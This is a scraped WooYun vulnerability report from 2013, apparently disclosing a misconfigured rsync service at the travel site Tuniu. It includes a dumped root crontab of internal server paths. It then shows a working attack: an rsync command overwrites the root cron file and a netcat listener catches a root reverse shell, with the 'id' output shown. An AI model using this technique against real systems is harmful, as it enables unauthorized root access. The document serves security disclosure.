0 4,10,16,22 * * * (cd /opt/tuniu/www/html/tuniuV2/scripts/liuxiaotao_temp; /usr/local/php/bin/php update_wp_posts2.php;)
#added@20110819 by shinan
#*/30 * * * * (cd /opt/tuniu/www/html/tuniuV2/scripts/shinan;/usr/local/php/bin/php update_index_hotel_recommend.php)
#added@20110824 by zhangshilin
55 5,11,17,23 * * * (cd /opt/tuniu/www/html/tuniuV2/scripts/zhangshilin; /usr/local/php/bin/php ./update_order_recall.php >> /opt/tuniu/mnt/logs/zhangshilin/update_order_recall.log)
#added@20110923 by chenjinglong
0 10 * * 1 (cd /opt/tuniu/www/html/tuniuV2/scripts/chenjinlong; /usr/local/php/bin/php CCB_send_email.php >> /opt/tuniu/mnt/logs/tuniuV2/CCB_send_email.php.log)
#added@20111014 by shinan
* 10-12 17,20,24,25,27 10 * (cd /opt/tuniu/www/html/tuniuV2/scripts/shinan/; /usr/local/php/bin/php check_australia_order.php >> /opt/tuniu/mnt/logs/shinan/check_australia_order.php.`date +\%Y.\%m.\%d`.log)
#added@20111020 by shinan
0 */12 * * * (cd /opt/tuniu/www/html/tuniuV2/scripts/shinan/; /usr/local/php/bin/php group_purchase_subscribe_syn.php >> /opt/tuniu/mnt/logs/shinan/group_purchase_subscribe_syn.`date +\%Y.\%m.\%d`.log)
#added@20111212 by shinan
5 8,11,18 * * * ( cd /opt/tuniu/www/html/tuniuV2/scripts/weather/; /usr/local/php/bin/php getweather.php )
5 8,11,18 * * * ( cd /opt/tuniu/www/html/tuniuV2/scripts/weather/; /usr/local/php/bin/php updateweather.php )
#added@20120206 by liubaozhong
0 2 * * * (cd /opt/tuniu/www/html/appserver.tuniu.com/; /usr/local/php/bin/php cron.php TravelsShareToService refleshTokens)
#added@20120210 by liubaozhong
0 1 * * * (cd /opt/tuniu/www/html/tuniuV2/scripts/; /usr/local/php/bin/php update_hot_route_for_route_satisfaction.php)
30 1 * * * (cd /opt/tuniu/www/html/tuniuV2/scripts/; /usr/local/php/bin/php update_hot_route_for_route_satisfaction_part_2.php)
0 2 * * * (cd /opt/tuniu/www/html/tuniuV2/scripts/; /usr/local/php/bin/php update_hot_route_for_route_satisfaction_part_3.php)
30 2 * * * (cd /opt/tuniu/www/html/tuniuV2/scripts/; /usr/local/php/bin/php update_hot_route_for_package_satisfaction.php)
#added@20120225 by liubaozhong
*/30 * * * * (cd /opt/tuniu/www/html/appserver.tuniu.com/; /usr/local/php/bin/php ./cron.php ClientInfoService doCalClientInfos &)
#added@20120629 by liubaozhong
0 2 */2 * * (cd /opt/tuniu/www/html/appserver.tuniu.com/; /usr/local/php/bin/php ./cron.php ShareToService refleshTokens)
#added@20120713 by tangjun
0 0 * * * (cd /opt/tuniu/www/html/tuniuV2/market/ticket/; /usr/local/php/bin/php index.php)
#added@20120714 by zhangjun
0 * * * * (cd /opt/tuniu/www/html/tuniuV2/scripts/company; /usr/local/php/bin/php retrieve_hotlines.php;)
#added@20120716 by ligang2
#*/15 * * * * (cd /opt/tuniu/www/html/tuniuV2/scripts/ticket/; /usr/local/php/bin/php ticket_memory.php)
0 8 * * * (cd /opt/tuniu/www/html/tuniuV2/scripts/ticket/; /usr/local/php/bin/php search_seivice.php)
#added@20120723 by huxiaomin
*/25 * * * * (cd /opt/tuniu/www/html/tuniuV2/scripts/unify/; /usr/local/php/bin/php refresh_memcache_cat_left2.php)
#added@20120725 by meicunbing
30 2 * * * (cd /opt/tuniu/www/html/hsww/protected/command/phpscript/; /usr/local/php/bin/php RefreshSiteClassificationAttr.php)
30 8 * * * (cd /opt/tuniu/www/html/hsww/protected/command/phpscript/; /usr/local/php/bin/php SyncSalesIndexDaily.php)
#added@20120725 by chenwei
#01 00 * * * /usr/local/sysadmin/cut_log.sh 
00 03 * * * /usr/local/sysadmin/create_sum_log.sh
#added@20120802 by shinan
*/30 * * * * (cd /opt/tuniu/www/html/tuniuV2/scripts/shinan; /usr/local/php/bin/php get_index.php)
*/5 * * * * /usr/sbin/ntpdate  ntp.tuniu.org
#added@20120928 by shinan
30 5 * * * (cd /opt/tuniu/www/html/tuniuV2/scripts/shinan; /usr/local/php/bin/php get_baidu_place_info.php)
#added@20110713 by yangzhiguo
0 */3 * * * /opt/tuniu/php/bin/php /opt/gfsmtion/mnt/bbs/scripts/server_zixun.php
0 */3 * * * /opt/tuniu/php/bin/php /opt/gfsmtion/mnt/bbs/scripts/server_group.php
0 */3 * * * /opt/tuniu/php/bin/php /opt/gfsmtion/mnt/bbs/scripts/server_zixun4index.php
#added@20121016 by daixiangpeng
0 6 * * * (cd /opt/tuniu/www/html/tuniuV2/guide/script/; /usr/local/php/bin/php sync_poi_for_solr.php >> /opt/tuniu/mnt/logs/snc/tourguide/sync_poi_for_solr.log)
#added@20121016 by OMS-1041
30 7 * * * (cd /opt/tuniu/www/html/hsww/protected/command/phpscript/; /usr/local/php/bin/php RefreshSiteSatisfication.php)
#added@20121101 by OMS-1079 OMS-1117
#*/3 * * * * (cd /opt/tuniu/www/html/hsww/protected/command/phpscript/; /usr/local/php/bin/php ReceiveTktInfo.php)
#*/3 * * * * (cd /opt/tuniu/www/html/hsww/protected/command/phpscript/; /usr/local/php/bin/php ReceiveScenicInfo.php)
#*/10 * * * * (cd /opt/tuniu/www/html/hsww/; /usr/local/php/bin/php protected/script/update.php)
*/10 * * * * (cd /opt/tuniu/www/html/hsww/; /usr/local/php/bin/php protected/script/updateTickets.php)
*/10 * * * * (cd /opt/tuniu/www/html/hsww/; /usr/local/php/bin/php protected/script/updateScenic.php)
0 */1 * * * (cd /opt/tuniu/www/html/hsww/; /usr/local/php/bin/php protected/script/add.php)
#added@20121115 by OMS-1207 meicunbing
0 * * * * (cd /opt/tuniu/www/html/hsww; /usr/local/php/bin/php protected/command/phpscript/createRouteMemcache.php)
#added@20121121 by OMS-1247 lishi
0 8 * * * (cd /opt/tuniu/www/html/hsww; /usr/local/php/bin/php protected/command/phpscript/SynTotalSaleDaily.php)
0 8 * * * (cd /opt/tuniu/www/html/hsww; /usr/local/php/bin/php protected/command/phpscript/SyncSalesIndexRankDaily.php)
#added@20121122 by oms-1259 huxiaomin
*/15 * * * * (cd /opt/tuniu/www/html/tuniuV2/scripts/unify; /usr/local/php/bin/php admin_drequest.php)
#added@20121127 by shinan
*/4 * * * * (cd /opt/tuniu/www/html/tuniuV2/scripts/shinan/; /usr/local/php/bin/php update_company_count_new.php)
#added@20121128 by oms-1265 lishi
*/30 * * * * (cd /opt/tuniu/www/html/tuniuV2/scripts/shinan/; /usr/local/php/bin/php get_index_home.php)
#added@20121207 by OMS-1377
* * * * * (cd /opt/tuniu/www/html/tuniuV2/scripts/shinan/; /usr/local/php/bin/php get_latest_order_html.php)
#added@20121210 by OMS-1390
30 4 * * * (cd /opt/tuniu/www/html/tuniuV2/guide/script/; /usr/local/php/bin/php poi_spot_sort.php)
#added@20130105 by lishi get ga.js
0 9 * * * (cd /opt/gfsmtion/static/site/js/common/; /usr/bin/wget -O ga.js http://www.google-analytics.com/ga.js)
#added@20120106 my OMS-1534
0 2 * * * ( cd /opt/tuniu/www/html/hsww/protected/command/phpscript; /usr/local/php/bin/php Sitemap.php )
#added@20130110 by OMS-1569
0 3 * * * ( cd /opt/tuniu/www/html/hsww/protected/command/phpscript; /usr/local/php/bin/php CreatePublicHeaderMemcache.php )
#added@20130114 by oms-1588 tangjun
0 3 * * * (cd /opt/tuniu/www/html/tuniuV2/scripts/; /usr/local/bin/php get_public_header_memcache.php)
#added@20130118 by OMS-1617
40 8 * * * (cd /opt/tuniu/www/html/tuniuV2/scripts/huajinliang/; /usr/local/bin/php setSalesIndex.php)
#add@20130124  by chenwei
*/5 * * * * /opt/tuniu/zabbix/script/zabbix_monitor_log.sh 
#added@20130129 by OMS-1551
0 1,13 * * * (cd /opt/tuniu/www/html/tuniuV2/scripts/scripts/shinan/; /usr/local/php/bin/php get_index_home_manual.php)
#added@20130130 by OMS-1668 wangyi
50 * * * * (cd /opt/tuniu/www/html/tuniuV2/scripts/maxthon; /usr/local/php/bin/php Batch.php)
#added@20130130 by OMS-1685 liqing
0 4 * * * (cd /opt/tuniu/www/html/tuniuV2/guide/script/; /usr/local/php/bin/php update_poi_statistics.php)
#added@20130205 by OMS-1696
*/15 * * * * (cd /opt/tuniu/www/html/tuniuV2/scripts/crm_relate/; /usr/local/php/bin/php sync_online_pay.php)
#added@20130205 by OMS-1702
0 * * * * (cd /opt/tuniu/www/html/hsww/protected/command/phpscript/; /usr/local/php/bin/php CreateCrossRecommendMemcache.php)
#added@20130206 by OMS-1706
0 1 * * * (cd /opt/tuniu/www/html/tuniuV2/scripts/duba/; /usr/local/php/bin/php create_duba_tickets_html.php)
#added@20130219 by OMS-1717
0 11,17 * * 1-5 (cd /opt/tuniu/www/html/tuniuV2/guide/script/; /usr/local/php/bin/php curlonexml_m.php)
0 4 * * 0-4 (cd /opt/tuniu/www/html/tuniuV2/guide/script/; /usr/local/php/bin/php curlonexml_v.php)
0 4 * * 0-4 (cd /opt/tuniu/www/html/tuniuV2/guide/script/; /usr/local/php/bin/php curlonexml_d.php)
0 0 * * 4 (cd /opt/tuniu/www/html/tuniuV2/guide/script/; /usr/local/php/bin/php curlnewkeytxt_n.php)
#added@20130313 by OMS-1870
0 1 * * * (cd /opt/tuniu/www/html/hsww/; /usr/local/php/bin/php protected/script/updateScenicEveryDay.php )
#added@20130313 by OMS-1867
0 2 * * * (cd /opt/tuniu/www/html/hsww/; /usr/local/php/bin/php protected/script/updateRemark.php )
#added@20130313 by OMS1873 yinfulei
0 4 * * 1-5 (cd /opt/tuniu/www/html/tuniuV2/guide/script; /usr/local/php/bin/php curlnewkeymanagetxt_d.php)
0 4 * * 1-5 (cd /opt/tuniu/www/html/tuniuV2/guide/script; /usr/local/php/bin/php curlnewkeymanagetxt_p.php)
0 4 * * 1-5 (cd /opt/tuniu/www/html/tuniuV2/guide/script; /usr/local/php/bin/php curlnewkeymanagetxt_m.php)
#added@20130320 by OMS-1907
55 * * * * (cd /opt/tuniu/www/html/tuniuV2/scripts/firefox/; /usr/local/php/bin/php batch.php )
#added@20130327 by OMS-1938
0 2 * * * (cd  /opt/tuniu/www/html/tuniuV2/scripts/travel_suggest/; /usr/local/php/bin/php batch.php)
#added@20130417 by OMS-2035
0 1 * * * (cd /opt/tuniu/www/html/hsww/; /usr/local/php/bin/php protected/script/updateSubscribe.php )
#added@20130418 by OMS-2051
* * * * * /bin/sh /opt/tuniu/www/html/tuniuV2/task/task.sh &
# Puppet Name: ntp
0 0 * * * /usr/sbin/ntpdate ntp.tuniu.org && /usr/sbin/hwclock --systohc
*/30 * * * * (cd /opt/tuniu/www/html/tuniuV2/scripts/weizhifeng_temp/; /usr/local/php/bin/php update_package_info.php)
#added@20130502 by OMS-2179
0 */2 * * * (cd /opt/tuniu/www/html/hsww/; /usr/local/php/bin/php protected/command/phpscript/RefreshPoiProductToDataBase.php)
#added@20130503 by OMS-2195
*/2 * * * * (cd /opt/tuniu/www/html/FAB/script/common; /usr/local/php/bin/php database_latency.php)
#added@20130503 by OMS-2161
0 0 * * 0 (cd /opt/tuniu/mnt/logs/xhprof/; /bin/ls | /usr/bin/xargs /bin/rm -f )
#added@20130521 by OMS-2294/OMS-2758/OMS-2803/OMS-2855
0 0 * * * (cd /opt/tuniu/www/html/hsww/; /usr/local/php/bin/php protected/command/phpscript/CreateDiyProductPromotionToDateBase.php)
30 11 * * * (cd /opt/tuniu/www/html/hsww/; /usr/local/php/bin/php protected/command/phpscript/CreateDiyProductPromotionToDateBase.php)
#added@OMS-2356
*/5 * * * * (cd /opt/tuniu/www/html/FAB/script/common/; /usr/local/php/bin/php analyze_access_log_awk.php)
#OMS-2398/2808/2855
0 2 * * * (cd /opt/tuniu/www/html/hsww/; /usr/local/php/bin/php protected/command/phpscript/updateClassificationOrder.php)
#OMS-2502
*/10 * * * * (cd /opt/tuniu/www/html/hsww/; /usr/local/php/bin/php protected/command/phpscript/DiyTourAutoReorder.php)
#OMS-2554
30 01 * * * (cd /opt/tuniu/www/html/hsww/; /usr/local/php/bin/php protected/command/phpscript/checkDiyApi.php)
#OMS-2557/OMS-2713
#*/5 * * * * (cd /opt/tuniu/www/html/hsww/protected/script; /usr/local/php/bin/php getProductMessage.php)
#*/5 * * * * (cd /opt/tuniu/www/html/hsww/protected/script; /usr/local/php/bin/php getProductPriceMessage.php)
#*/30 * * * * (cd /opt/tuniu/www/html/hsww/protected/script; /usr/local/php/bin/php getProductMsgFromDb.php)
#*/30 * * * * (cd /opt/tuniu/www/html/hsww/protected/script; /usr/local/php/bin/php getProductPriceMsgFromDb.php)
#OMS-2601
0 * * * * (cd /opt/tuniu/www/html/hsww; /usr/local/php/bin/php protected/command/phpscript/GoogleChartCountScript.php)
#tomcat log rotate
05 00 * * *  /opt/tuniu/sysadmin/cron/log_rotate.py

漏洞证明：

覆盖rsync /tmp/t.cron m.tuniu.com::cron/root
然后就有rootshell了

nc -l -vv 8888
Connection from 58.68.255.41 port 8888 [tcp/ddi-tcp-1] accepted
sh: no job control in this shell
sh-3.2# id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)

修复方案：

版权声明：转载请注明来源结界师@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：20

确认时间：2013-08-19 10:26

厂商回复：

问题确认，感谢@结界师

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2013-034704

漏洞标题：途牛网某服务运维不当导致主站可以被入侵及渗透（涉及核心代码和数据）

相关厂商：途牛旅游网

漏洞作者：结界师

提交时间：2013-08-19 10:25

修复时间：2013-10-03 10:26

公开时间：2013-10-03 10:26

漏洞类型：系统/服务运维配置不当

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源结界师@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2013-034704

漏洞标题：途牛网某服务运维不当导致主站可以被入侵及渗透（涉及核心代码和数据）

相关厂商：途牛旅游网

漏洞作者： 结界师

提交时间：2013-08-19 10:25

修复时间：2013-10-03 10:26

公开时间：2013-10-03 10:26

漏洞类型：系统/服务运维配置不当

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2013-034704"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 结界师@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

漏洞作者：结界师

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源结界师@乌云